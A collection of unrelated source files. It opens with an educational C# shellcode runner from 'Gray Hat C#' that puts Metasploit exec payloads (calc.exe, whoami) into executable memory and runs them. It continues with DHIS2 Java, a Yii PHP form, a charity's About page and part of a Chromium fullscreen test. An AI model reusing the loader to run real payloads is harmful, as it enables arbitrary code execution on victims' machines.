// an unmanaged delegate.  Educational payload-runner from "Gray Hat C#".
class MainClass
{
    // Win32 allocator.  Call sites pass type = 0x1000 (MEM_COMMIT) and
    // mode = 0x40 (PAGE_EXECUTE_READWRITE) so the region is immediately
    // writable and executable.
    [DllImport("kernel32")]
    static extern IntPtr VirtualAlloc(IntPtr ptr, IntPtr size, IntPtr type, IntPtr mode);

    // Delegate type used to invoke the shellcode on Windows.
    [UnmanagedFunctionPointer(CallingConvention.Winapi)]
    delegate void WindowsRun();

    // POSIX page-protection change; needed because posix_memalign returns
    // non-executable memory.
    [DllImport("libc")]
    static extern IntPtr mprotect(IntPtr ptr, IntPtr length, IntPtr protection);

    // POSIX aligned allocator; writes the allocated pointer into 'ptr' and
    // returns zero on success.
    [DllImport("libc")]
    static extern IntPtr posix_memalign(ref IntPtr ptr, IntPtr alignment, IntPtr size);

    [DllImport("libc")]
    static extern void free(IntPtr ptr);

    // Delegate type used to invoke the shellcode on Linux (cdecl).
    [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
    delegate void LinuxRun();

    public static void Main(string[] args)
    {
        OperatingSystem os = Environment.OSVersion;
        // IntPtr.Size is 4 in a 32-bit process, 8 in a 64-bit process.
        bool x86 = (IntPtr.Size == 4);
        byte[] payload;
        if (os.Platform == PlatformID.Win32Windows || os.Platform == PlatformID.Win32NT)
        {
            if (!x86)
                /*
                 * windows/x64/exec - 276 bytes
                 * http://www.metasploit.com
                 * VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
                 * CMD=calc.exe
                 */
                payload = new byte[] {
                    0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52,
                    0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48,
                    0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9,
                    0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
                    0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48,
                    0x01, 0xd0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01,
                    0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48,
                    0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
                    0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c,
                    0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0,
                    0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04,
                    0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59,
                    0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48,
                    0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00, 0x00, 0x00,
                    0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, 0x6f,
                    0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
                    0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb,
                    0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c,
                    0x63, 0x2e, 0x65, 0x78, 0x65, 0x00 };
            else
                /*
                 * windows/exec - 200 bytes
                 * http://www.metasploit.com
                 * VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
                 * CMD=calc.exe
                 */
                payload = new byte[] {
                    0xfc, 0xe8, 0x89, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xd2, 0x64, 0x8b, 0x52, 0x30,
                    0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff,
                    0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2,
                    0xf0, 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x42, 0x3c, 0x01, 0xd0, 0x8b, 0x40, 0x78, 0x85,
                    0xc0, 0x74, 0x4a, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x8b, 0x58, 0x20, 0x01, 0xd3, 0xe3,
                    0x3c, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0x31, 0xc0, 0xac, 0xc1, 0xcf, 0x0d,
                    0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf4, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe2, 0x58,
                    0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b,
                    0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff,
                    0xe0, 0x58, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x86, 0x5d, 0x6a, 0x01, 0x8d, 0x85, 0xb9, 0x00,
                    0x00, 0x00, 0x50, 0x68, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56,
                    0x68, 0xa6, 0x95, 0xbd, 0x9d, 0xff, 0xd5, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75,
                    0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x53, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63,
                    0x2e, 0x65, 0x78, 0x65, 0x00 };

            // Commit an RWX region sized to the payload, copy the shellcode
            // in, and invoke it through a function-pointer delegate.
            IntPtr ptr = VirtualAlloc(IntPtr.Zero, (IntPtr)payload.Length, (IntPtr)0x1000, (IntPtr)0x40);
            Marshal.Copy(payload, 0, ptr, payload.Length);
            WindowsRun r = (WindowsRun)Marshal.GetDelegateForFunctionPointer(ptr, typeof(WindowsRun));
            r();
        }
        // PlatformID values 4 (Unix), 6 (MacOSX) and 128 (legacy Mono Unix)
        // all indicate a Unix-like host.
        else if ((int)os.Platform == 4 || (int)os.Platform == 6 || (int)os.Platform == 128) //linux
        {
            if (!x86)
                /*
                 * linux/x64/exec - 55 bytes
                 * http://www.metasploit.com
                 * VERBOSE=false, PrependSetresuid=false,
                 * PrependSetreuid=false, PrependSetuid=false,
                 * PrependSetresgid=false, PrependSetregid=false,
                 * PrependSetgid=false, PrependChrootBreak=false,
                 * AppendExit=false, CMD=/usr/bin/whoami
                 */
                payload = new byte[] {
                    0x6a, 0x3b, 0x58, 0x99, 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53,
                    0x48, 0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8, 0x10, 0x00,
                    0x00, 0x00, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x77, 0x68, 0x6f, 0x61,
                    0x6d, 0x69, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05 };
            else
                /*
                 * linux/x86/exec - 51 bytes
                 * http://www.metasploit.com
                 * VERBOSE=false, PrependSetresuid=false,
                 * PrependSetreuid=false, PrependSetuid=false,
                 * PrependSetresgid=false, PrependSetregid=false,
                 * PrependSetgid=false, PrependChrootBreak=false,
                 * AppendExit=false, CMD=/usr/bin/whoami
                 */
                payload = new byte[] {
                    0x6a, 0x0b, 0x58, 0x99, 0x52, 0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68,
                    0x00, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x10, 0x00, 0x00, 0x00, 0x2f,
                    0x75, 0x73, 0x72, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x77, 0x68, 0x6f, 0x61, 0x6d, 0x69, 0x00,
                    0x57, 0x53, 0x89, 0xe1, 0xcd, 0x80 };
            IntPtr ptr = IntPtr.Zero;
            IntPtr success;
            // Tracks whether posix_memalign succeeded so 'finally' only
            // frees memory we actually own.
            bool freeMe = false;
            try
            {
                int pagesize = 4096;
                IntPtr length = (IntPtr)payload.Length;
                success = posix_memalign(ref ptr, (IntPtr)32, length);
                if (success != IntPtr.Zero)
                {
                    Console.WriteLine("Bail! memalign failed: " + success);
                    return;
                }
                freeMe = true;
                // NOTE(review): casting the pointer to int truncates it to
                // 32 bits; on a 64-bit process this can compute a bogus
                // page base. Presumably should use long - TODO confirm.
                IntPtr alignedPtr = (IntPtr)((int)ptr & ~(pagesize - 1)); //get page boundary
                IntPtr mode = (IntPtr)(0x04 | 0x02 | 0x01); //RWX -- careful of selinux
                // NOTE(review): length 32 is shorter than either payload;
                // this relies on mprotect affecting whole pages and on the
                // payload not crossing a page boundary - confirm.
                success = mprotect(alignedPtr, (IntPtr)32, mode);
                if (success != IntPtr.Zero)
                {
                    int err = Marshal.GetLastWin32Error();
                    Console.WriteLine("Bail! mprotect failed: " + err);
                    return;
                }
                Marshal.Copy(payload, 0, ptr, payload.Length);
                LinuxRun r = (LinuxRun)Marshal.GetDelegateForFunctionPointer(ptr, typeof(LinuxRun));
                r();
            }
            finally
            {
                if (freeMe)
                    free(ptr);
            }
        }
    }
}
}
| brandonprry/gray_hat_csharp_code | ch4_crossplatform_metasploit_payloads/Program.cs | C# | bsd-3-clause | 7,542 |
package org.hisp.dhis.period;
/*
* Copyright (c) 2004-2015, University of Oslo
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
* list of conditions and the following disclaimer.
*
* Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* Neither the name of the HISP project nor the names of its contributors may
* be used to endorse or promote products derived from this software without
* specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
* ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
* ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
import com.google.common.collect.Lists;
import org.hisp.dhis.calendar.Calendar;
import org.hisp.dhis.calendar.DateTimeUnit;
import java.util.Date;
import java.util.List;
/**
* @author Lars Helge Overland
*/
public abstract class FinancialPeriodType
    extends CalendarPeriodType
{
    /**
     * Determines if a de-serialized file is compatible with this class.
     */
    private static final long serialVersionUID = 2649990007010207631L;

    /** Frequency order in days; a financial year spans one year. */
    public static final int FREQUENCY_ORDER = 365;

    // -------------------------------------------------------------------------
    // Abstract methods
    // -------------------------------------------------------------------------

    /**
     * Returns the zero-based month in which the financial year starts;
     * callers add 1 to obtain the 1-based DateTimeUnit month.
     */
    protected abstract int getBaseMonth();

    // -------------------------------------------------------------------------
    // PeriodType functionality
    // -------------------------------------------------------------------------

    /**
     * Creates the financial-year period containing the given date. The period
     * starts on day 1 of the base month and ends one year later, minus a day.
     * If the date falls before the base month, the period is the financial
     * year that began in the previous calendar year.
     *
     * NOTE(review): the dateTimeUnit argument is mutated via setMonth/setDay,
     * and arithmetic uses getCalendar() while the supplied calendar is only
     * used for the final ISO conversion - confirm this mix is intended.
     */
    @Override
    public Period createPeriod( DateTimeUnit dateTimeUnit, Calendar calendar )
    {
        // True when the date is on/after the financial year's start month
        boolean past = dateTimeUnit.getMonth() >= (getBaseMonth() + 1);

        if ( !past )
        {
            dateTimeUnit = getCalendar().minusYears( dateTimeUnit, 1 );
        }

        dateTimeUnit.setMonth( getBaseMonth() + 1 );
        dateTimeUnit.setDay( 1 );

        DateTimeUnit start = new DateTimeUnit( dateTimeUnit );
        DateTimeUnit end = new DateTimeUnit( dateTimeUnit );
        end = getCalendar().plusYears( end, 1 );
        end = getCalendar().minusDays( end, 1 );

        return toIsoPeriod( start, end, calendar );
    }

    @Override
    public int getFrequencyOrder()
    {
        return FREQUENCY_ORDER;
    }

    // -------------------------------------------------------------------------
    // CalendarPeriodType functionality
    // -------------------------------------------------------------------------

    /** Returns the financial year one year after the given period. */
    @Override
    public Period getNextPeriod( Period period, Calendar calendar )
    {
        DateTimeUnit dateTimeUnit = createLocalDateUnitInstance( period.getStartDate(), calendar );
        dateTimeUnit = calendar.plusYears( dateTimeUnit, 1 );

        return createPeriod( dateTimeUnit, calendar );
    }

    /** Returns the financial year one year before the given period. */
    @Override
    public Period getPreviousPeriod( Period period, Calendar calendar )
    {
        DateTimeUnit dateTimeUnit = createLocalDateUnitInstance( period.getStartDate(), calendar );
        dateTimeUnit = calendar.minusYears( dateTimeUnit, 1 );

        return createPeriod( dateTimeUnit, calendar );
    }

    /**
     * Generates financial yearly periods for the last 5, current and next 5
     * financial years.
     */
    @Override
    public List<Period> generatePeriods( DateTimeUnit dateTimeUnit )
    {
        Calendar cal = getCalendar();

        boolean past = dateTimeUnit.getMonth() >= (getBaseMonth() + 1);

        List<Period> periods = Lists.newArrayList();

        // Rewind to the start of the earliest financial year: 5 back when the
        // date is past the base month, 6 back otherwise (since the current
        // financial year began in the previous calendar year).
        dateTimeUnit = cal.minusYears( dateTimeUnit, past ? 5 : 6 );
        dateTimeUnit.setMonth( getBaseMonth() + 1 );
        dateTimeUnit.setDay( 1 );

        Calendar calendar = getCalendar();

        // 11 periods: 5 past + current + 5 future
        for ( int i = 0; i < 11; i++ )
        {
            periods.add( createPeriod( dateTimeUnit, cal ) );
            dateTimeUnit = calendar.plusYears( dateTimeUnit, 1 );
        }

        return periods;
    }

    /**
     * Generates the last 5 financial years where the last one is the financial
     * year which the given date is inside.
     */
    @Override
    public List<Period> generateRollingPeriods( Date date )
    {
        return generateLast5Years( date );
    }

    /** Same as {@link #generateRollingPeriods(Date)} for a DateTimeUnit. */
    @Override
    public List<Period> generateRollingPeriods( DateTimeUnit dateTimeUnit )
    {
        return generateLast5Years( getCalendar().toIso( dateTimeUnit ).toJdkDate() );
    }

    /**
     * Generates the 5 financial years ending with the one containing the
     * given date.
     */
    @Override
    public List<Period> generateLast5Years( Date date )
    {
        Calendar cal = getCalendar();

        DateTimeUnit dateTimeUnit = createLocalDateUnitInstance( date, cal );
        boolean past = dateTimeUnit.getMonth() >= (getBaseMonth() + 1);

        List<Period> periods = Lists.newArrayList();

        // Rewind 4 years when inside the current financial year, 5 otherwise
        dateTimeUnit = cal.minusYears( dateTimeUnit, past ? 4 : 5 );
        dateTimeUnit.setMonth( getBaseMonth() + 1 );
        dateTimeUnit.setDay( 1 );

        for ( int i = 0; i < 5; i++ )
        {
            periods.add( createPeriod( dateTimeUnit, cal ) );
            dateTimeUnit = cal.plusYears( dateTimeUnit, 1 );
        }

        return periods;
    }

    /**
     * Returns the given date moved back by the given number of financial
     * years. Defaults: date = now, rewindedPeriods = 1 when null.
     */
    @Override
    public Date getRewindedDate( Date date, Integer rewindedPeriods )
    {
        Calendar cal = getCalendar();

        date = date != null ? date : new Date();
        rewindedPeriods = rewindedPeriods != null ? rewindedPeriods : 1;

        DateTimeUnit dateTimeUnit = createLocalDateUnitInstance( date, cal );
        dateTimeUnit = cal.minusYears( dateTimeUnit, rewindedPeriods );

        return cal.toIso( dateTimeUnit ).toJdkDate();
    }
}
| kakada/dhis2 | dhis-api/src/main/java/org/hisp/dhis/period/FinancialPeriodType.java | Java | bsd-3-clause | 6,505 |
<?php

use yii\helpers\Html;
use yii\widgets\ActiveForm;

/* @var $this yii\web\View */
/* @var $model app\models\ClinicaFoneSearch */
/* @var $form yii\widgets\ActiveForm */

/* Partial view: renders the search/filter form for ClinicaFone listings.
 * Submits via GET to the controller's `index` action so the filter state
 * lives in the URL (bookmarkable/shareable). */
?>
<div class="clinica-fone-search">

    <?php $form = ActiveForm::begin([
        'action' => ['index'],
        'method' => 'get',
    ]); ?>

    <?= $form->field($model, 'clinica') ?>

    <?= $form->field($model, 'sequencia') ?>

    <?= $form->field($model, 'principal') ?>

    <?= $form->field($model, 'fone') ?>

    <?= $form->field($model, 'obs') ?>

    <?php // echo $form->field($model, 'ativo') ?>

    <div class="form-group">
        <?= Html::submitButton('Search', ['class' => 'btn btn-primary']) ?>
        <?= Html::resetButton('Reset', ['class' => 'btn btn-default']) ?>
    </div>

    <?php ActiveForm::end(); ?>

</div>
| baccaglini/labvet | views/clinica-fone/_search.php | PHP | bsd-3-clause | 822 |
<?
$_in_help_content_page=True;
include('../_header.php');
?>
<div >
<h1>About</h1>
<h2><a name="history"></a>History</h2>
<p>Paxtoncrafts Charitable Trust was formed in 2000 after a favourite uncle suffered a stroke, robbing him of his speech and the ability to read and write. His intellect was unimpaired, but he found it very frustrating being unable to communicate to friends and family. </p>
<p>Several of our family had careers in the IT industry so we were surprised to discover that technology at this time was of little help. Communication devices were available, but very expensive, which meant speech and language therapists rarely encountered them and had little knowledge of this area. Nor was there any formal assessment process that would show whether a particular device was suitable. </p>
<p>Therapists had low expectations of Uncle Ray's future ability to communicate but this was more about the lack of tools and options at their disposal, and not his potential or motivation.</p>
<p>He resigned himself, good-naturedly, in his final few years to communicating with us in his own form of sign language.</p>
<p>In recognising this to be a nationwide, even global problem, it seemed appropriate to do something about it. Garry and Liz Paxton, as committed Christians, formed the charity in order to address this need, with Garry leaving his IT career to move full time into the field of Augmentative and Alternative Communication. </p>
<p>Supported by trustees and volunteers with specialist skills in the special needs sector, many bespoke speech and communication programs were created for elderly patients who had suffered a stroke (and had been referred to us by our local speech and language department) while our work at Southview Special school in Essex resulted in our working alongside youngsters with conditions such as cerebral palsy. We developed communication tools related to their social communication needs but additionally the curriculum requirements for each Key Stage in dialogue with teaching staff.</p>
<p>We have also worked closely with the Revival Centre, a children's
rehabilitation centre in Ukraine, which is 50 miles from the site of the
Chernobyl nuclear disaster. Two thousand children a year are treated
here, many born with disabilities arising from the radiation their parents
acquired in 1986. Working with neurologists, we have developed a system
for producing communication charts for the children which they can take
home (few people can afford PCs or communication devices). The same team
in Ukraine has now implemented this at the main geriatric hospital in
Chernigiv, where adult stroke patients take home their own tailored
communication book. The intention is to implement this across all
relevant Ukrainian hospitals</p>
<p>Straight Street Ltd was formed to own the IPR and copyright of all the charity's computer products.
While all our computer programs are free, we found we often had to buy a symbol set on behalf of each client. The lack of a free symbol set became an obstacle to sharing our products more widely as this is a huge expense for a small charity, limiting the numbers of people we could reach. </p>
<p>Because of this, combined with the increasing bureaucracy required to run a UK Registered charity, the Trustees decided in 2007 that the wider work of the charity (which focussed on helping individuals locally) would be wound down. Instead, following a substantial grant, all our efforts would be concentrated on developing the symbol set, which we believe will have a much wider reach and a global impact. Our symbol set is now being translated into other languages. </p>
<h2><a name="funding"></a>Our Funding</h2>
<p>To make our products free, we decided to set up Paxtoncrafts Charitable Trust and obtain grants to fund our work. The development of a symbol set is time-consuming and costly, but other providers of symbol sets use the traditional approach of setting up a business and selling the symbols to fund the development.</p>
<p>If you wish to make a contribution to our efforts, please <a href="/contact.php?subject=Donation">contact the Trustees</a>.</p>
<a href='../help.php'>Back to Help page</a>
</div>
</div>
<?
include('../_footer.php');
?> | straight-street/straight-street | Helpfiles/about.php | PHP | bsd-3-clause | 4,326 |
// Copyright (c) 2012 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "build/build_config.h"
#include "chrome/browser/ui/browser.h"
#include "chrome/browser/ui/browser_tabstrip.h"
#include "chrome/browser/ui/fullscreen/fullscreen_controller.h"
#include "chrome/browser/ui/fullscreen/fullscreen_controller_state_test.h"
#include "chrome/test/base/browser_with_test_window_test.h"
#include "content/public/browser/web_contents.h"
#include "content/public/common/url_constants.h"
#include "testing/gtest/include/gtest/gtest.h"
// The FullscreenControllerStateUnitTest unit test suite exhastively tests
// the FullscreenController through all permutations of events. The behavior
// of the BrowserWindow is mocked via FullscreenControllerTestWindow.
//
// FullscreenControllerStateInteractiveTest is an interactive test suite
// used to verify that the FullscreenControllerTestWindow models the behavior
// of actual windows accurately. The interactive tests are too flaky to run
// on infrastructure, and so those tests are disabled. Run them with:
// interactive_ui_tests
// --gtest_filter="FullscreenControllerStateInteractiveTest.*"
// --gtest_also_run_disabled_tests
// A BrowserWindow used for testing FullscreenController. ----------------------
class FullscreenControllerTestWindow : public TestBrowserWindow {
 public:
  // Simulate the window state with an enumeration.
  enum WindowState {
    NORMAL,
    FULLSCREEN,
    // No TO_ state for METRO_SNAP, the windows implementation is synchronous.
    METRO_SNAP,
    TO_NORMAL,       // Asynchronous transition back to NORMAL in progress.
    TO_FULLSCREEN,   // Asynchronous transition to FULLSCREEN in progress.
  };

  FullscreenControllerTestWindow();
  virtual ~FullscreenControllerTestWindow() {}

  // BrowserWindow Interface:
  virtual void EnterFullscreen(const GURL& url,
                               FullscreenExitBubbleType type) OVERRIDE;
  virtual void EnterFullscreen();
  virtual void ExitFullscreen() OVERRIDE;
  virtual bool IsFullscreen() const OVERRIDE;
#if defined(OS_WIN)
  virtual void SetMetroSnapMode(bool enable) OVERRIDE;
  virtual bool IsInMetroSnapMode() const OVERRIDE;
#endif
#if defined(OS_MACOSX)
  virtual void EnterFullscreenWithChrome() OVERRIDE;
  virtual bool IsFullscreenWithChrome() OVERRIDE;
  virtual bool IsFullscreenWithoutChrome() OVERRIDE;
#endif

  // Debug name for |state|, used in test logs.
  static const char* GetWindowStateString(WindowState state);
  WindowState state() const { return state_; }
  void set_browser(Browser* browser) { browser_ = browser; }
  void set_reentrant(bool value) { reentrant_ = value; }
  bool reentrant() const { return reentrant_; }

  // Simulates the window changing state.
  void ChangeWindowFullscreenState();

  // Calls ChangeWindowFullscreenState() if |reentrant_| is true.
  void ChangeWindowFullscreenStateIfReentrant();

 private:
  WindowState state_;
  // True while simulating Mac "fullscreen with chrome" (browser UI visible).
  bool mac_with_chrome_mode_;
  Browser* browser_;
  // Causes reentrant calls to be made by calling
  // browser_->WindowFullscreenStateChanged() from the BrowserWindow
  // interface methods.
  bool reentrant_;
};
FullscreenControllerTestWindow::FullscreenControllerTestWindow()
    : state_(NORMAL),
      mac_with_chrome_mode_(false),
      browser_(NULL),
      reentrant_(false) {
}

// The tab-fullscreen URL and bubble type are irrelevant to this mock; both
// EnterFullscreen() overloads funnel into the parameterless version.
void FullscreenControllerTestWindow::EnterFullscreen(
    const GURL& url, FullscreenExitBubbleType type) {
  EnterFullscreen();
}

void FullscreenControllerTestWindow::EnterFullscreen() {
  mac_with_chrome_mode_ = false;
  if (!IsFullscreen()) {
    state_ = TO_FULLSCREEN;
    ChangeWindowFullscreenStateIfReentrant();
  }
}

void FullscreenControllerTestWindow::ExitFullscreen() {
  if (IsFullscreen()) {
    state_ = TO_NORMAL;
    mac_with_chrome_mode_ = false;
    ChangeWindowFullscreenStateIfReentrant();
  }
}

bool FullscreenControllerTestWindow::IsFullscreen() const {
#if defined(OS_MACOSX)
  // Mac reports fullscreen as soon as the transition into fullscreen begins.
  return state_ == FULLSCREEN || state_ == TO_FULLSCREEN;
#else
  // Other platforms keep reporting fullscreen until the transition back to
  // normal has finished.
  return state_ == FULLSCREEN || state_ == TO_NORMAL;
#endif
}
#if defined(OS_WIN)
// Metro snap is modeled synchronously (no TO_ states involved).
void FullscreenControllerTestWindow::SetMetroSnapMode(bool enable) {
  if (enable != IsInMetroSnapMode()) {
    if (enable)
      state_ = METRO_SNAP;
    else
      state_ = NORMAL;
  }
  // NOTE(review): this fires even when the snap state did not change --
  // presumably harmless for the mock, but confirm if reentrancy tests flake.
  ChangeWindowFullscreenStateIfReentrant();
}

bool FullscreenControllerTestWindow::IsInMetroSnapMode() const {
  return state_ == METRO_SNAP;
}
#endif

#if defined(OS_MACOSX)
void FullscreenControllerTestWindow::EnterFullscreenWithChrome() {
  EnterFullscreen();
  mac_with_chrome_mode_ = true;
}

bool FullscreenControllerTestWindow::IsFullscreenWithChrome() {
  return IsFullscreen() && mac_with_chrome_mode_;
}

bool FullscreenControllerTestWindow::IsFullscreenWithoutChrome() {
  return IsFullscreen() && !mac_with_chrome_mode_;
}
#endif
// static
// Returns a human-readable name for |state|; used only for debug logging.
const char* FullscreenControllerTestWindow::GetWindowStateString(
    WindowState state) {
  switch (state) {
    case NORMAL:
      return "NORMAL";
    case FULLSCREEN:
      return "FULLSCREEN";
    case METRO_SNAP:
      return "METRO_SNAP";
    case TO_FULLSCREEN:
      return "TO_FULLSCREEN";
    case TO_NORMAL:
      return "TO_NORMAL";
    default:
      NOTREACHED() << "No string for state " << state;
      return "WindowState-Unknown";
  }
}
void FullscreenControllerTestWindow::ChangeWindowFullscreenState() {
  // Several states result in "no operation" intentionally. The tests
  // assume that all possible states and event pairs can be tested, even
  // though window managers will not generate all of these.
  switch (state_) {
    case NORMAL:
      break;
    case FULLSCREEN:
      break;
    case METRO_SNAP:
      break;
    case TO_FULLSCREEN:
      state_ = FULLSCREEN;    // Complete the pending enter-fullscreen.
      break;
    case TO_NORMAL:
      state_ = NORMAL;        // Complete the pending exit-fullscreen.
      break;
    default:
      NOTREACHED();
  }
  // Emit a change event from every state to ensure the Fullscreen Controller
  // handles it in all circumstances.
  browser_->WindowFullscreenStateChanged();
}

void FullscreenControllerTestWindow::ChangeWindowFullscreenStateIfReentrant() {
  if (reentrant_)
    ChangeWindowFullscreenState();
}
// Unit test fixture testing Fullscreen Controller through its states. ---------
// Fixture combining the generic FullscreenControllerStateTest state-machine
// logic with BrowserWithTestWindowTest's browser/window scaffolding.
class FullscreenControllerStateUnitTest : public BrowserWithTestWindowTest,
                                          public FullscreenControllerStateTest {
 public:
  FullscreenControllerStateUnitTest();

  // FullscreenControllerStateTest:
  virtual void SetUp() OVERRIDE;
  virtual void ChangeWindowFullscreenState() OVERRIDE;
  virtual const char* GetWindowStateString() OVERRIDE;
  virtual void VerifyWindowState() OVERRIDE;

 protected:
  // FullscreenControllerStateTest:
  virtual bool ShouldSkipStateAndEventPair(State state, Event event) OVERRIDE;
  virtual void TestStateAndEvent(State state,
                                 Event event,
                                 bool reentrant) OVERRIDE;
  virtual Browser* GetBrowser() OVERRIDE;

  // Owned by BrowserWithTestWindowTest once handed to set_window().
  FullscreenControllerTestWindow* window_;
};
FullscreenControllerStateUnitTest::FullscreenControllerStateUnitTest()
    : window_(NULL) {
}

void FullscreenControllerStateUnitTest::SetUp() {
  window_ = new FullscreenControllerTestWindow();
  set_window(window_);  // BrowserWithTestWindowTest takes ownership.
  BrowserWithTestWindowTest::SetUp();
  // The mock window needs the Browser back-pointer so it can emit
  // WindowFullscreenStateChanged() notifications.
  window_->set_browser(browser());
}

// Delegate state transitions and state naming to the mock window.
void FullscreenControllerStateUnitTest::ChangeWindowFullscreenState() {
  window_->ChangeWindowFullscreenState();
}

const char* FullscreenControllerStateUnitTest::GetWindowStateString() {
  return FullscreenControllerTestWindow::GetWindowStateString(window_->state());
}
// Asserts that the mock window's state matches what the controller state
// machine says it should be. Controller states that share the same expected
// window state are grouped into a single case-label list; the assertion and
// debug-log handling per case are unchanged.
void FullscreenControllerStateUnitTest::VerifyWindowState() {
  switch (state_) {
    case STATE_NORMAL:
      EXPECT_EQ(FullscreenControllerTestWindow::NORMAL,
                window_->state()) << GetAndClearDebugLog();
      break;

#if defined(OS_WIN)
    case STATE_METRO_SNAP:
      EXPECT_EQ(FullscreenControllerTestWindow::METRO_SNAP,
                window_->state()) << GetAndClearDebugLog();
      break;
#endif

    // All settled fullscreen variants map to the same window state.
